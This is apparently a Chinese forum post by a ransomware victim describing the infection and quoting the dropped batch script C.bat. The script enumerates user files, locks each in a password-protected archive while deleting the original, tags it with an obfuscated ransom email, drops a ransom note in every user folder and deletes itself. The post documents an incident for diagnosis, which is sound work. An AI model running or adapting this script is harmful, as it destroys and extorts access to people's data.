今天早晨开机密码不对了,再查发现多了一个System32用户,进PE改密码进系统,在360杀毒的时候,再查发现勒索病毒的文件,360未报毒,关机进Ubuntu查看文件,只加密了几个文件(貌似),还在搜索。
在我的Users/THHICV/Videos/Windows01目录下有:
C.bat D.bat E.bat F.bat README_WARNING.TXT update.exe
C.txt D.txt E.txt F.txt exclude.txt
C.bat貌似是用来生成索引文件的:
dir /b /s /a-d "C:\" 2>nul| findstr /ilv /c:"%ProgramFiles%" /c:"%windir%" /c:"%serprofile%\appdata" /c:"%ProgramData%" >C.txt
setlocal enabledelayedexpansion
set key=%1
set start="update.exe"
set fl=C.txt
for /f "delims=" %%i in (%fl%) do (
for /f "delims=" %%j in ("%%i") do (
%start% a -p%key% -inul -y -m0 -k -mt64 -ibck -ep -afzip -df -x@exclude.txt "%%~dpj\%%~nxj.[u%itwsgmjnerbqiy%n%wwegbxiyutaux%l%ejvo%o%xfkqbjoucu%c%fdnnbcm%k%lacsxihatqaleu%e%cndivspiz%r%vgpwll%@%yzdol%o%eizmrqt%n%qnhjvqacbrxw%i%ktvruxt%o%ekzuoqli%n%knsvcjnnxjkmjg%m%qkdvadmmnmbc%a%fqcptoco%i%uwjmlauycgvxh%l%bointflz%.%intwoyc%o%wbdxvxsxtnvv%r%ssgzd%g%ckauaeaslpysje%].id[%key:~-5%].lock" "%%i"
)
)
for /r "C:\Users" %%f in (.) do (
copy "README_WARNING.TXT" "%%~ff" > nul
)
DEL C.txt
del %0
exit
C.txt每一行就是一个文件。
|